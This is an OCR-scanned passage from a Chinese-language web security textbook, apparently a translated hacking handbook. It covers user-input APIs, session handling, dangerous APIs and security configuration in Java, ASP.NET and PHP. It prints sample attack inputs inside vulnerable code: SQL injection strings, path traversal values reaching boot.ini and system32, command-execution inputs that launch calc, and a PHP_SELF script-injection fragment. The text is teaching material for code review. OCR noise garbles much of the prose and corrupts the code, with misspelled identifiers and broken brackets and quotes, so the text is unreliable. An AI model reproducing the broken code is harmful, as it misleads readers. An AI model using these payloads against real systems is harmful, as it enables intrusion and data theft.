当前 会 话 中 的 信息 。 每 会 话 存储 (per-session storage) 是 字符 串 名 称 与 
one 的 一 个 映射 。 表 19-2 列 出 的 API 用 于 保存 和 检索 会 话 中 的 数 
RE 





#219-2 Java 和 平台 中 用 于 与 用 户 会 话 交 互 的 API 


API Hio R 
setAttribute 用 于 保存 当前 会 话 中 的 数据 
putValue 





getAttribute 用 于 查询 保存 在 当前 会 话 中 的 数据 
getValue 

getAttributeNames 

getValueNames 


19.3.3 ”潜在 危险 的 API 

这 一 节 介 绍 一 些 常见 的 Java API。 以 危险 的 方式 使 用 这 些 API 可 能 
会 造成 安全 漏洞 。 

1. 文件 访问 

在 Java 中 ， 用 于 访问 文件 与 目录 的 主要 的 类 为 java.io.File。 从 安全 





的 角度 看 ， 这 个 类 的 最 重要 的 用 法 是 调用 它 的 构造 函数 ， 该 构造 函数 接 
受 一 个 父 目 录 和 文件 名 ， 或 者 仅 为 一 个 路 径 名 。 

无 论 以 哪 种 方式 使 用 构造 函数 ， 如 果 未 检查 其 中 是 否 包 含 点 -点 - 斜 
线 序列 就 将 用 户 可 控制 的 数据 作为 文件 名 参数 提交 ， 那么 可 能 会 造成 路 
Co 
=A NF: 








String userinput = "..\\boot.ini"; 
File f = new File("C:\\temp", userinput); 


在 Java 中 ， 和 弟 用 于 读 取 与 写 入 文件 内 容 的 类 包括 : 

口 java.io.FileInputStream 

口 java.io.FileOutputStream 

口 java.io.FileReader 

口 java.io.FileWriter 

这 些 类 从 它们 的 构造 函数 中 提取 File 对 象 ， 或 者 通过 文件 名 字符 串 
打开 文件 。 如 果 用 户 可 控制 的 数据 作为 这 个 参数 提交 ， 同 样 可 能 会 引入 
路 径 裔 历 漏洞 。 例 如 : 


FileIncutStream fis = new FileInputStream("C:\\temp\\" + userinput}) ; 

2. 数据 库 访问 

下 面 这 些 是 第 用 于 以 SQL 查 询 执 行 任何 一 个 字符 串 的 API: 

D java.sql.Connection.createStatement 

D java.sql.Statement.execute 

DQ java.sql.Statement.executeQuery 

如 果 用 户 提 交 的 数据 属于 以 但 询 执 行 的 字符 串 的 一 部 分 ， 那 么 它 可 
Sb 例如 : 


String username = *ađmin' or 1=1 





String password = "foo"; 


Statement s = connection.createStatement [}; 
s.executeQuery (“SELECT * FROM users WHERE username = *' + username + 
"* AND password = ”' + password + "'* 
它 执 行 不 良 查 i 
执行 不 良 查 询 。 
SELECT * FROM users WHERE username = ‘admin' or 1=1--' AND pa ord = *f 


下 面 的 API 更 加 稳定 可 靠 ， 外 够 替代 前 面 描述 的 API; “Seven 用 各 
序 创建 一 个 预先 编译 的 QL 语句， 并 以 可 靠 旦 类 型 安全 的 方式 指定 它 的 
参数 占 位 符 的 值 : 


D java.sql.Connection.prepareStatement 


口 java.sql.PreparedStatement.setString 

DQ java.sql.PreparedStatement.setInt 

O java.sql.PreparedStatement.setBoolean 

口 java.sql.PreparedStatement.setObject 

O java.sql.PreparedStatement.execute 

D java.sql.PreparedStatement.executeQuery 

当然 还 有 许多 ， 此 处 不 一 一 列 出 。 

如 果 按 正常 的 方式 使 用 ， 这 些 API 就 不 易 受 到 SQL 注入 攻击 。 例 








如 : 
String username = "admin' or 1=1--"; 
String password = "foo"; 
Statement s = connection.prepareStatement ( 
“SELECT * FROM users WHERE username = ? AND password = ?"*); 
s.serString(1, username); 


s.setString(2, password); 


$.executeQuery (}; 
它 生 成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = ‘admin'' or i-i--' AND 


password = 'foo' 


3. 动态 代码 执行 

Java 语言 本 吴 并 不 包 售 任 何 动 态 评估 Java 源 代码 的 机 制 ， 尽 管 一 些 
应 用 (主要 在 数据 库 产 品 中 〉 提供 了 评 佑 方法。 如 果 所 审 碍 的 应 用 程序 
动态 构建 任何 Java 代 码 ， 就 应 该 了 解 应 用 程序 如 何 构建 这 些 代 码 ， 并 决 
定 用 户 可 控制 的 数据 是 否 以 危险 的 方式 使 用 。 

4. OS 命令 执行 

下 面 的 API 用 于 在 Java 应 用 程序 中 执行 外 部 操作 系统 命令 : 

Ø java.lang.runtime.Runtime.getRuntime 

DQ java.lang.runtime.Runtime.exec 

如 果 提 有 交 给 exec 的 字符 串 参 数 完全 可 由 用 户 控 制 ， 那 么 几乎 可 以 肯 
定 应 用 程序 易于 受到 任何 命令 执行 攻击 。 例 如 ， 下 面 的 代码 将 运行 
Windows calc 程 序 : 


String userinput = "calc"; 
Runtime.getRuntime. exec (userinput) ; 


O Am GUAR 1M ENE a execH aba FFB, ASA MHE 
序 可 能 不 易于 受到 攻击 。 在 下 面 的 示例 中 ， 用 户 可 控制 的 数据 以 命令 行 
参数 的 形式 提交 给 记事 本 进程 ， 引 起 它 尝 试 加 载 | calc: 





String userinput = "| calc"; 
Runtime.getRuntime.exec("notepad “ + userinput); 


exec API 本 身 并 不 解释 & 与 | 等 shell 元 字符 ， 因 此 这 个 攻击 失败 。 
有 时 ， 仅 控制 部 分 字符 串 提交 给 exec 仍 然 足以 执行 任意 命令 ;例如 
下 面 这 个 稍微 不 同 的 示例 (注意 notepad 后 面 缺 少 一 个 空格 〉: 


String userinput = "\\..\\system32\\calc"; 
Runtime.getRuntime().exec("notepad" + userinput) ; 


通常 ， 在 这 种 情况 下 ， 应 用 程序 将 易于 受到 除 代 码 执行 以 外 的 攻 
击 。 例 如 ， 如 果 应 用 程序 以 用 户 可 控制 的 参数 作为 目标 URL 执 行 wget 程 
序 ， 那 么 攻击 者 就 可 以 网 wget 进 程 传递 危险 的 命令 行 参数 ， 例 如 ， 和 致使 
它 下 载 一 个 文档 ， 并 将 该 文档 保存 在 文件 系统 中 的 任何 位 置 。 

5. URLE 

下 面 的 API 用 于 在 Java 中 发 布 HTTP 重 定 问 : 

O javax.servlet.http.HttpServletResponse.sendRedirect 

O javax.servlet.http.HttpServletResponse.setStatus 

O javax.servlet.http.HttpServletResponse.addHeader 

通常 ， 使 用 sendRedirect 方 法 可 以 引起 一 个 重 定 疝 啊 应 ， 该 方法 接 
受 一 个 包含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 串 的 值 由 用 户 控 
制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

还 应 该 审查 setStatus 与 addHeader API 的 所 有 用 法 。 如 果 某 个 重 定向 
包含 一 个 含有 HTTP Location 消 恩 头 的 3xxX 啊 应 ， 应 用 程序 就 可 能 使 用 这 
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java.net.Socket 类 从 它 的 构造 函数 中 提取 与 目标 主机 和 端口 有 关 的 各 
种 信息 ， 如 果 用 户 能 够 以 某 种 方式 控制 这 些 信息 ， 攻 击 者 就 可 以 利用 应 
用 程序 与 任意 主机 建立 网 络 连接 ， 无 论 这 些 主机 位 于 因特网 上 、 私 有 
DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 


19.3.4 配置 Java 环 境 


web.xml 文 件 包 含 Java 平 台 坏 境 的 配置 设置 ， 同 时 它 还 控制 着 应 用 
程序 的 行为 。 如 果 应 用 程序 使 用 容器 安全 管理 ， 那 么 验证 与 授权 将 在 
web.xml 文 件 中 ， 根 据 被 保护 的 每 一 个 资源 或 资源 集 ， 于 应 用 程序 代码 
以 外 声明 。 可 在 web.xml 文 件 中 设置 的 配置 选项 如 表 19-3 所 示 。 




















#219-3 Java 环境 中 与 安全 有 关 的 配置 设置 


设 A 描 述 

login-config 元 素 配 置 验证 细 市 

login-config 两 类 验证 分 别 为 forms-based (页 面 由 form-login-page 
元 素 指 定 ) 与 在 
auth-method 元 素 中 指定 的 Basic Auth 或 Client-Cert 
如 果 使 用 基于 表单 的 验证 ， 指 定 的 表单 必须 将 操作 定 
义 为 j_security_check， 并 必 
须 提 交 j_username 与 j_password 参 数 。Java 应 用 程序 将 
把 它 当 做 一 个 登录 请 求 处 理 








security- 如 果 定 义 了 login-config 元 素 ， 就 可 以 使 用 security- 
constraint constraintyt A bR E A 





源 。 这 个 元 素 可 用 于 定义 受 保护 的 资源 

在 security-constraint 元 系 中 ， 可 以 使 用 url-pattern 元 素 
定义 资源 集 。 例 如 : 

<url-pattern>/admin/*</url-pattern> 

分 别 在 role-name 与 principal-name 元 素 中 定义 的 角色 与 
主要 用 户 可 以 访问 这 些 





session-config session-timeout 元 素 配 置 会 话 超 时 (单位 : 分 钟 ) 
error-page error-page 元 素 定 义 应 用 程序 如 何 处 理 错误 。 通 过 


error-code 与 exceptiontype 
元 素 可 单独 处 理 HTTP 错 误 代码 与 Java 异 常 
init-param init-param 元 素 配 置 各 种 初始 化 参数 。 其 中 包括 与 安全 
有 关 的 设置 : 
Dlistings 应 设置 为 false 
口 debug 应 设置 为 0 


Servlet 可 以 使 用 HttpServletRequest.isUserInRole 访 问 Servlet 代 码 中 的 
相同 角色 信息 ， 实 施 编程 检查 。 映 射 项 security-role-ref 将 内 置 的 角色 检 
查 与 对 应 的 容器 角色 连接 起 来 。 

除 web.xml 文 件 外 ， 不 同 应 用 程序 服务 器 还 可 能 使 用 包含 其 他 安全 
相关 设置 的 次 要 部 署 文件 (如 weblogic.xml 文 件 ) ， 当 分 析 环 境 配 置 








时 ， 应 检查 这 些 设置 。 





19.4 ASP.NET 


本 节 主 要 介绍 在 ASP.NET 平 台 上 获取 用 户 提交 的 输入 的 方法 、 与 用 
户 会 话 交 互 的 方式 、 其 中 存在 的 潜在 危险 的 API 以 及 与 平台 安全 相关 的 
配置 选项 。 








19.4.1 确定 用 户 提 交 的 类 








ASP.NET 应 用 程序 通过 System.Web.HttpRequest 类 获取 用 户 提交 的 
输入 。 这 个 类 中 包含 大 量 Web 应 用 程序 用 于 访问 用 户 提交 的 数据 的 属性 
和 方法 。 表 19-4 列 出 的 API 可 用 于 获取 用 户 请 求 中 的 数据 。 








表 19-4 ASP.NET 平 台中 用 于 获取 用 户 提 交 的 数据 的 API 


API fii = 28 
Params 以 String 名 称 与 String 值 的 形式 保存 URL 查 询 字 符 串 、 
POST 请 求 主 体 、HTTP 
cookie 以 及 其 他 服务 器 变量 中 的 参数 。 这 个 属性 返回 





这 些 参 数 类 型 的 集合 
Item 返回 Param 集 合 中 的 命名 项 
Form 返回 用 户 提 交 的 表单 变量 名 称 与 变量 值 集合 


QueryString 返回 请 求 查 询 字 符 串 中 变量 名 称 与 变量 值 的 集合 
ServerVariables 返回 大 量 ASP 服 务 右 变量 (类 似 于 CGI 变 量 ) 名 称 与 
变量 值 的 集合 ， 包 括 请 求 原始 
数据 、 查 询 字 符 串 、 请 求 方 法 、HTTP Host 消 息 头 等 








Headers 以 String 名 称 与 String 值 之 间 的 映射 的 形式 保存 请 求 中 
的 HITP 消 息 头 ， 使 用 这 
个 属性 可 以 访问 该 映射 

Url 这 些 属性 返回 请 求 中 的 URL 信 息 ， 包 括 查 询 字 符 串 

RawUrl 

UrlReferer 返回 与 在 请 求 的 HTTP Referer 消 息 头 中 指定 的 URL 有 
关 的 信息 


Cookies 返回 Cookie 对 象 的 集合 ， 其 中 包含 请 求 所 收 到 的 


cookie 的 信息 ， 包 括 它 们 的 名 称 
与 值 
Files 返回 用 户 上 传 的 文件 集合 
InputStream 这 些 API 返 回 客 户 端 送出 的 原始 请 求 的 不 同 表示 形 
BinaryRead 式 ， 因 此 可 用 于 访问 其 他 所 有 API 
获得 的 任何 信息 
HttpMethod 返回 HTTP 请 求 所 使 用 的 方法 














Browser 返回 用 户 浏览 器 的 信息 ， 与 在 HTTP User-Agenti Sk 
UserA gent 中 提交 的 信息 类 似 


AcceptTypes ”返回 客户 端 文 持 的 MIME 类 型 的 字符 串 数组 ， 与 在 
HTTP Accept 消 息 头 中 提交 的 信 
SAW 
UserLanguages 返回 包含 客户 端 所 接受 的 语言 的 字符 串 数组 ， 与 在 
HTTP Accept-Language 消 息 
头 中 提交 的 信息 类 似 


19.4.2 会话 交互 


.ASP.NET 应 用 程序 以 各 种 方式 与 用 户 会 语 进行 交互 ， 以 保存 和 检索 


使 用 Session 属 性 可 轻松 保存 和 检索 当前 会 话 中 的 信息 。 这 个 属性 的 
访问 方式 与 任何 其 他 索引 集合 类 似 : 


Session["MyName"] = txtmMyName. Text; / /保存 用 户 名 





ibiWelcome.Text = "Welcome *+Session["MyName"]; // 检 索 用 户 名 


ASP.NET 个 性 化 配置 与 Session 属 性 的 用 法 非常 相似 ， 其 唯一 不 同 之 
处 在 于 ， 前 者 相对 于 一 个 特定 的 用 户 ， 因 此 在 相同 用 户 的 不 同 会 话 中 持 
续 保 存 不 变 。 在 不 同 的 会 话 中 ， 用 户 的 身份 通过 验证 机 制 或 一 个 特殊 的 
o a 在 用 户 个 性 化 配置 中 ， 数 据 以 下 列 方 式 保 
FF WAR 


Profile.MyName = txtMyName.Text; /1 保存 用 户 名 
lblWelcome.Text = "Welcome " + Profile.MyName; // 检 索 用 户 名 
另外 ，System.Web.SessionState.HttpSessionState 类 也 可 用 于 保存 和 
检索 会 话 中 的 信息 。 它 以 字符 串 名 称 与 对 象 值 之 间 映 射 的 方式 保存 信 
上 ， 使 用 表 19-5 中 列 出 的 API 可 以 访问 这 个 映射 。 








4219-5 ASP.NET 平 台中 用 于 与 用 户 会 话 交 互 的 API 


API 描述 
Add 在 会 话 集合 中 增加 一 个 数据 项 
Item 获取 或 设 定 集合 中 命名 数据 项 的 值 
Keys 返回 集合 中 所 有 数据 项 的 名 称 
GetEnumerator 


CopyTo 将 值 组 成 的 集合 复制 到 数组 中 


19.4.3 ”潜在 危险 的 API 


这 一 节 介 绍 一 些 常 见 的 ASP.NET API。 以 危险 的 方式 使 用 这 些 API 
可 能 会 造成 安全 漏洞 。 

1. 文件 访问 

System.IO.File 是 用 于 访问 ASP.NET 文 件 最 主要 的 类 。 它 的 所 有 方法 
都 是 静态 的 ， 并 且 没 有 公共 构造 函数 。 

这 个 类 的 37 个 方法 全 都 接受 一 个 文件 名 作为 参数 。 如 果 未 检查 其 中 
是 否 包 含 点 -点 - 斜 线 序 列 ， 束 提交 用 户 可 控制 的 数据 ， 就 会 造成 路 径 表 
历 漏 洞 。 例 如 ， 下 面 的 代码 将 打开 Windows C:\ 驱动 器 根 目录 下 的 一 个 
文件 : 

string userinput = "..\\boot.ini"; 

FileStream fs = File.Open("C:\\temp\\" + userinput, 








FileMode.OpenOrCreate) ; 
下 面 的 类 常用 于 读 取 与 写 入 文件 内 容 : 
D System.IO.FileStream 
D System.IO.StreamReader 
DQ System.IO.Stream Writer 
它们 的 各 种 构造 函数 接受 一 个 文件 路 径 作 为 参数 。 如 采 提 交 用 户 可 
控制 的 数据 ， 这 些 构 造 函 数 可 能 引入 路 径 志 有 历 漏洞 。 例 如 : 
string userinput = *..\\foo. txt"; 
FileStream fs = new FileStream("F:\\tmp\\" + userinput, 
FileMode.OpenOrCreate) ; 
2. 数据 库 访问 
ASP.NET 有 许多 用 于 访问 数据 库 的 API， 下 面 的 类 主要 用 于 建立 并 





执行 SQL 语句 : 
D System.Data.SqlClient.SqglCommand 
DQ System.Data.SqlClient.SqlDataAdapter 
D System.Data.Oledb.OleDbCommand 
口 System.Data.Odbc.OdbcCommand 
口 System.Data.9qlServerCe.SdlCeCommand 
其 中 每 个 类 都 有 一 个 构造 函数 ， 它 接受 一 个 包含 SQL 语句 的 字符 
P; 而 且 每 个 类 都 有 一 个 CommandText 属 性 ， 可 用 于 获取 并 设 定 SQL 语 
句 的 当前 值 。 如 果 适 当地 配置 一 个 命令 对 象 ， 通 过 调用 Execute 方 法 即 
可 执行 SQL 语句 。 

如 采用 户 提 区 的 数据 属于 以 查询 执行 的 字符 串 的 一 部 分 ， 那 么 应 用 
程序 可 a ol PAR 








string username = “admin’ or 1=1- 
string password = "foco"; 
OdbcCommand c = new OdbcCommand(*SELECT * FROM users WHERE username = '" 
+ username ~ "' AND password = “' + password = *'*, connection}; 


c.ExecuteNonQuery (); 
它 会 执行 不 恨 碍 询 : 


SELECT * FROM users WHERE username = ‘admin' or 1=1--' 
AND password = ‘foo' 

上 面 列 出 的 每 一 个 类 通过 它们 的 Parameters 属 性 文 持 预 处 理 语句 ， 
允许 应 用 程序 创建 一 个 包含 参数 占 位 符 的 SQL 语 句 ， 并 以 可 靠 且 类 型 安 
全 的 方式 设 定 这 些 占 位 符 的 值 。 如 果 按 正常 的 方式 使 用 ， 这 种 机 制 就 不 
易 受 到 SQL 注 入 攻击 。 例 如 : 


string username = “admin' or i=] 





string password = "foo"; 
OdbcCommana c = new OcbhcCommanda("“SELECT + FROM users WHERE username = 


@username AND password = RISE connection); 
c.Parameters.Add(new OdbcParameter("“Gusername", OdbcType.Text).Value = 
username); 
c.Parameters.Acc(new OdbcParameter ("Gpassword", OdbcType.Text).Value = 


password); 
c.ExecuteNonQuer 


它 生成 的 查询 等 同 于 : 


SELECT * FROM users WHERE username = '‘admin'' or 1=-1--' 
AND password = 'foo' 


3. 动态 代码 执行 
VBScript 函 数 Eval 接 受 一 个 包含 VBScript 表 达 式 的 字符 串 自 变量 。 


该 函数 求 出 这 个 表达 式 的 值 ， 并 返回 结果 。 如 果 用 户 可 控制 的 数据 被 合 
并 到 要 计算 值 的 表达 式 中 ， 那 么 用 户 就 可 以 执行 任意 命令 或 修改 应 用 程 
序 的 逻辑 。 

函数 Execute 和 ExecuteGlobal 接 受 一 个 包含 ASP 代 码 的 字符 串 ， 这 个 
ASP 代 码 与 直接 出 现在 脚本 中 的 代码 的 执行 方式 完全 相同 。 冒 号 分 隔 符 
用 于 将 几 个 语句 连接 在 一 起 。 如 果 癌 Execute 国 数 提交 用 户 可 控制 的 数 
据 ， Ne re 

4. OS 命令 

下 面 的 API 可 以 各 种 方式 在 ASP.NET 应 用 程序 中 运行 外 部 进程 : 

DQ System.Diagnostics. Start.Process 

DQ System.Diagnostics.Start.ProcessStartInfo 

在 对 对 象 调用 Start 之 前 ， 可 以 同 静 态 Process.Start 方 法 提交 一 个 文件 
名 字符 串 ， 或 者 用 一 个 文件 名 配置 Process 对 象 的 StartInfo 属 性 。 如 条 文 
件 名 字 符 串 可 完全 由 用 户 控制 ， 那 么 应 用 程序 几乎 可 以 肯定 易于 受到 任 
意 命 令 执 行 攻击 。 例 如 ， 下 面 的 代码 将 运行 Windows calc 程 序 : 


string userinput = "calc"; 





Process.Start(userinput) ; 
然而 ， 如 果 用 户 仅 能 够 控制 提交 给 Start 的 部 分 字符 串 ， 那 么 应 用 程 
ee 可 能 易于 受到 攻击 。 例 如 : 


tring userinput = "..\\..\\..\\Windows\\System32\\calc"; 


Proc 





ess.Start("C:\\Program Files\\MyApp\\bin\\" + userinput); 


API 并 不 解释 & 与 | 等 shell 元 字符 ， 也 不 接受 文件 名 参数 中 的 命令 
行 参数 ， 因 此 ， 如 果 用 户 仪 控制 文件 名 参数 的 一 部 分 ， 这 种 攻击 是 唯一 
能 够 成 功 的 攻击 。 

已 被 局 动 的 进程 的 命令 行 参 数 可 以 使 用 ProcessStartInfo 类 的 
Arguments 属 性 设 定 。 如 果 只 有 Arguments 参 数 可 由 用 户 控制 ， 应 用 程序 
仍然 易于 受到 除 代码 执行 以 外 的 其 他 攻击 。 例 如 ， 如 果 应 用 程序 以 用 户 
可 控制 的 参数 作为 目标 URL 执 行 wget 程 序 ， 那 么 攻击 者 就 可 以 向 wget 进 
程 提交 人 危险 的 命令 行 参数 ， 例 如 ， 致 使 它 下 载 一 个 文档 ， 并 将 该 文档 保 
存在 文件 系统 中 的 任何 位 置 。 

5. URL 重 定向 

下 面 的 API 用 于 在 ASP.NET 中 发 布 一 个 HTTP 重 定向 : 

口 System.Web.HttpResponse.Redirect 

口 System.Web.HttpResponse. Status 

口 System.Web.HttpResponse.StatusCode 


口 System.Web.HttpResponse.AddHeader 

D System.Web.HttpResponse. AppendHeader 

口 Server. Transfer 

通常 ， 使 用 HttpResponse.Redirect 方 法 可 以 引起 一 个 重 定向 响应 ， 

该 方法 接受 一 个 包含 相对 或 绝对 URL 的 字符 串 。 如 果 这 个 字符 串 的 值 由 
用 户 控 制 ， 那 么 应 用 程序 可 能 易于 受到 钓鱼 攻击 。 

还 必须 确保 检查 Status/StatusCode 属 性 与 AddHeader/AppendHeader 
方法 的 用 法 。 如 宋 茶 个 重 定 同 包含 一 个 舍 有 HTTP Location 消 息 头 的 3xx 
响应 ， 应 用 程序 就 可 能 使 用 这 些 API 执 行 章 定 问 。 

Server.Transfer 方 法 有 时 也 可 用 于 实现 重 定 同 。 实 际 上 ， 这 个 方法 
并 不 能 实现 HITP 重 定向 ， 而 是 应 根据 当前 请 求 修 改 被 服务 器 处 理 的 页 
面 。 因 此 ， 不 能 通过 破坏 它 重 定向 到 一 个 站 外 URL; 这 个 方法 对 攻击 者 
而 言 并 没有 多 大 用 处 。 
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System.Net.Sockets.Socket 类 用 于 创建 网 络 套 接 字 。 创 建 一 个 Socket 
对 象 后 ， 再 通过 调用 Connect 方 法 连接 这 个 对 象 ; 该 方法 接受 目标 主机 
的 IP 与 端口 信息 为 参数 。 如 果 用 户 能 够 以 某 种 方式 控制 这 些 主机 信息 ， 
攻击 者 就 可 以 利用 应 用 程序 与 任意 主机 建立 网 络 连接 ， 无 论 这 些 主机 位 
于 因特网 上 、 私 有 DMZ 中 还 是 在 应 用 程序 上 运行 的 内 部 网 络 内 。 


19.4.4 配置 ASP.NET 环 十 


Web 根 目录 下 的 web.config XML 文件 包含 ASP.NET 环 境 的 配置 设 
置 ， 它 还 控制 着 应 用 程序 的 行为 ， 如 表 19-6 所 示 。 























表 19-6 ASP.NET 环 境 中 与 安全 有 关 的 配置 设置 


设 置 ja 8 

httpCookies ”这 个 元 素 决 定 与 cookie 有 关 的 安全 设置 。 如 果 
httpOnlyCookies 属 性 为 真 ， 那 么 cookie 将 被 
标记 为 HttpOnly， 因 而 不 能 被 客户 端 脚本 直接 访问 。 如 果 
requireSSL 属 性 为 真 ，cookie 
eee 因此 只 能 由 浏览 器 通过 HTTPS 请 求 

sessionState ”这 个 元 素 决 定 会 话 的 行为 。timeout 属 性 的 值 决 定 一 个 空 
朵 会 话 的 到 期 时 间 〈 单 位 : 分 钟 ) 。 





compilation 


customErrors 


httpRuntime 


如 果 regenerateExpiredSessionId 元 素 设 为 true (默认 情 
况 ) ， 那 么 在 收 到 一 个 到 期 

会 话 ID 后 ， 将 发 布 一 个 新 的 会 话 ID 

这 个 元 素 决 定 是 否 将 调试 符号 编译 到 页 面 中 ， 生 成 更 详 
细 的 调试 错误 信息 。 如 果 debug 属 性 

为 true， 调 试 符 号 将 包含 在 页 面 中 

这 个 元 素 决 定 ， 如 果 发 生 无 法 处 理 的 错误 ， 应 用 程序 是 
售 返 回 详细 的 错误 消息 。 如 果 mode 属 

性 为 On 或 RemoteOnly， 那 么 应 用 程序 用 户 将 收 到 被 属性 
defaultRedirect 确 认 的 页 面 ， 

而 不 是 系统 生成 的 详细 消息 

这 个 元 素 决 定 各 种 运行 时 设置 。 如 果 
enableHeaderChecking 属 性 为 true 〈 默 认 情 况 ) ， 
ASP.NET 将 在 请 求 消息 头 中 检查 潜在 的 注入 攻击 ， 包 括 
路 站 点 脚本 。 如 果 enable-VersionHeader 

属性 为 tue 〈 默 认 情况 ) ，ASP.NET 将 输出 一 个 详细 的 版 
本 字符 串 ， 攻 击 

者 可 利用 它 在 特定 版 本 的 平台 中 搜索 漏洞 








如 果 数 据 库 连 接 字 符 串 之 类 的 敏感 数据 保存 在 配置 文件 中 ， 应 使 用 
ASP.NET“ 受 保护 配置 ?特性 加 密 这 些 数据 。 


19.5 PHP 











本 节 主 要 介绍 在 PHP 平 台 上 获取 用 户 提 交 的 输入 的 方法 、 与 用 户 会 


oe 0 ee 
项 。 











PHP 使 用 一 系列 数组 变量 保存 用 户 提交 的 数据 ， 如 表 19-7 所 示 。 





表 19-7 PHP 平 台中 用 于 获取 用 户 提交 的 数据 的 变量 


X E 
$_GET 
$HTTP_GET_VARS 


$_POST $HTTP_POST_VARS 
$_COOKIE $HTTP_COOKIE_VARS 


$_REQUEST 


$_FILES $HTTP_POST_FILES 


描 述 
这 个 数组 包含 在 查询 字 
符 串 中 提交 的 参数 。 这 些 
参数 根据 其 名 称 访 
ae ee 





https://wahh- 
app.com/search.php? 
query=foo 

查询 参数 的 值 使 用 以 下 代 
码 访问 : 
$_GET[‘query’] 

这 个 数组 包含 在 请 求 主 
体 中 提交 的 参数 

这 个 数组 包含 在 请 求 主 
体 中 提交 的 cookie 

这 个 数组 包含 $_GET、 
$_POST 与 $ COOKIE 数 
组 中 的 所 有 数据 

这 个 数组 包含 在 请 求 中 
上 传 的 文件 


$_ SERVER[‘REQUEST_METHOD’] 包含 在 HTTP 请 求 中 使 用 














的 方法 
$ SERVER[‘QUERY_STRING’] 包含 在 请 求 中 提交 的 完 
整 查询 字符 串 
$ SERVER[‘REQUEST_URI’] 包含 在 请 求 中 提交 的 完 
整 URL 
$_SERVER[‘HTTP_ACCEPT’] 包含 HTTP Accept 消 息 头 
的 内 容 
$_SERVER['HTTP_ACCEPT_CHARSET'] HTTP Accept-charset 
消息 头 的 内 容 


$ SERVER[‘HTTP_ACCEPT_ENCODING’] 包含 HTTP Accept- 
encoding TAHIA 

$ SERVER[‘HTTP_ACCEPT_LANGUAGE’] 包含 HTTP Accept- 
language 消 息 头 的 内 容 


$ SERVER[‘HTTP_CONNECTION’ | 包含 HTTP Connection 
ALWAR 

$_ SERVER[‘HTTP_HOST’] 包含 HTTP Host 消 息 头 的 
内 容 

$_ SERVER[‘HTTP_REFERER’ | 包含 HTTP Referer 消 息 头 
的 内 容 

$_SERVER['HTTP_ USER_AGENT”] 4,5 HTTP User-agent 消 
ALWAR 

$_ SERVER[‘PHP_SELF’] 包含 当前 运行 脚本 的 名 


称 。 虽 然 攻 击 者 无 法 控制 
脚本 名 称 ， 但 可 以 

在 这 个 名 称 后 附加 路 径 信 
上 县。 例如 ， 如 果 一 个 脚本 
包含 以 下 代码 : 

<form action=“<?= 

$ SERVER[‘PHP_SELF’ | 
?>”> 

那么 攻击 者 束 可 以 设计 诸 
eee 


/search.php/"><script> 


a 定 PHP 应 用 程序 如 何 访问 用 户 提交 的 输入 时 ， 应 该 记 住 以 
下 反 第 情况 。 

口 $GLOBALS 是 一 个 包含 在 脚本 全 局 范围 内 定义 的 所 有 变量 的 引用 
的 数组 。 使 用 它 可 以 根据 名 称 访问 其 他 变量 。 

口 如 果 配 置 指令 register_globals 被 激活 ，PHP 会 为 所 有 请 求 参 数 〈 即 
$_REQUEST 数 组 中 的 全 部 数据 ) 建立 全 局 变量 。 这 表示 ， 应 用 程序 可 
通过 与 相关 参数 相同 的 名 称 引 用 一 个 变量 ， 从 而 访问 用 户 输入 。 如 果 应 
用 程序 使 用 这 种 方法 访问 用 户 提交 的 数据 ， 那 么 只 有 仔细 地 逐 行 审查 代 
码 ， 才 能 确定 以 这 种 方式 使 用 的 变量 。 

口 除 前 面 提 到 的 标准 HITP 消 息 头 外 ，PHP 还 在 $_SERVER 数 组 中 增 
加 了 一 个 数据 ， 用 于 处 理 在 请 求 中 收 到 的 任何 定制 HTTP 消息 头 。 例 
如 ? 提交 消 Ask : 

生成 : 

$_SERVER['HTTP_FOO'] = "Bar" 


口 名 称 包含 下 标 〈 方 括号 内 ) 的 输入 参数 被 自动 转换 为 数组 。 例 
如 ， 请 求 下 面 的 URL: 


htips://wahh-app.com/search.php?query [a]=foo&query [bd] =bar 
将 使 $_GET[‘query’] 变 量 的 值 转换 成 一 个 包含 两 个 成 员 的 数组 。 如 
果 一 个 数组 被 提 交 给 一 个 希望 收 到 标量 值 的 函数 ， 可 能 会 在 应 用 程序 中 
出 现 无 法 预料 的 行为 。 
19.5.2 ZX A 


PHP 使 用 $_SESSION 数 组 保存 和 检索 用 户 会 话 中 的 信息 。 例 如 : 


$_SESSION['MyName'] = 959_GETI'Username' 1]: /7 store user's name 














echo "Welcome ” . S_SRSSTON[ 'MyName']; // retrieve user's name 


$HTTP_ SESSION_VARS 数 组 的 用 法 与 上 面 的 数组 相同 。 
如 果 register_globals 被 激活 〈 见 19.5.4 节 ) ， 那 么 全 局 变量 将 通过 以 
下 方式 保存 在 当前 会 话 中 : 


SMyName = $_GET['username']; 


session_register("MyName") ; 





这 一 节 介绍 一 些 常 见 的 PHP API。 以 危险 的 方式 使 用 这 些 API 可 能 
会 造成 安全 漏洞 。 

1. 文件 访问 

PHP 中 包含 大 量 用 于 访问 文件 的 函数 ， 其 中 许多 接受 可 用 于 访问 远 
程 文件 的 URL 和 其 他 结构 。 

下 面 的 函数 用 于 读 取 或 写 入 一 个 指定 文件 的 内 容 。 如 果 癌 这 些 API 
提交 用 户 可 控制 的 数据 ， 攻 击 者 就 可 以 利用 这 些 API 访 问 服务 堪 文 件 系 
统 上 的 任意 文件 。 

口 fopen 

口 readfile 

口 file 

D fpassthru 

DQ gzopen 

口 gzfile 

口 gzpassthru 

口 readgzfile 

口 copy 

LJ rename 

Q) rmdir 

D mkdir 

DD unlink 

DQ file_get_contents 

DQ file_put_contents 

D parse_ini_file 

下 面 的 函数 用 于 包含 并 执行 一 个 指定 的 PHP 脚 本 。 如 有 果 攻 击 者 能 够 
使 应 用 程序 执行 受 控 的 文件 ， 他 就 可 以 在 服务 器 上 执行 任意 命令 。 
Dinclude 

Dinclude_once 

口 require 

口 require_once 

D virtual 

请 注意 ， 即 使 无 法 包含 远程 文件 ， 但 如 果 攻 击 者 可 回 服 务 器 上 传 任 
意 文件 ， 他 仍然 能 够 执行 任意 命令 。 

PHP 配 置 选项 allow_url_fopen 可 用 于 防止 一 些 文件 函数 访问 远程 文 
件 。 但 是 ， 在 默认 情况 下 ， 这 个 选项 设 为 1〈 表 示人 允许 远程 文件 ) ; Al 
此 ， 表 19-8 中 列 出 的 协议 可 用 于 检索 远程 文件 。 

















表 19-8 可 用 于 检索 远程 文件 的 网 络 协议 


